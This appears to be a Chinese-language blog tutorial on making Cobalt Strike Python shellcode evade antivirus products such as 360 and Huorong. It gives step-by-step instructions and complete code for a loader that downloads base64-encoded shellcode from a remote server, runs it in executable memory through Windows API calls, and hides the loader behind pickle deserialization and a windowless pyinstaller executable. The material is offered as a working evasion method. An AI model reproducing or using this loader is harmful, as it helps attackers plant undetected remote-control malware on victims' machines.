python shellcode免杀(过最新360,火绒,不过最新的windows))
第一步cs生成python版测shellcode
![](https://upload-images.jianshu.io/upload_images/4664072-02e9e01a7d933a75.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第二步 提取双引号内容,并进行base64编码,放入python04.TXT
![](https://upload-images.jianshu.io/upload_images/4664072-99dd17768c2932d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第三步 shellcode加载器修改地址,并进行base64加密,放入pythonshellcode.txt。同时将pythonshellcode.txt和python04.txt放到vps,并开启http服务
python -m SimpleHTTPServer 8080
第四步 修改main.py 并且使用pyinstaller打包exe
pyinstaller -F -w main.py
-w 去黑窗
shell code
import ctypes,urllib.request,codecs,base64 shellcode = urllib.request.urlopen('http://192.168.195.140:19000/shellcode.txt').read() shellcode = shellcode.strip() shellcode = base64.b64decode(shellcode) shellcode =codecs.escape_decode(shellcode)[0] shellcode = bytearray(shellcode) # 设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) # 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) # 创建一个线程从shellcode放置位置首地址开始执行 handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) # 等待上面创建的线程运行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
main
import pickle import ctypes,urllib.request,codecs,base64 sectr = urllib.request.urlopen('http://192.168.195.140:19000/loader.txt').read() sectr = base64.b64decode(sectr).decode("utf-8") class A(object): def __reduce__(self): return (exec, (sectr,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) ret_decode = base64.b64decode(ret_base64) pickle.loads(ret_decode)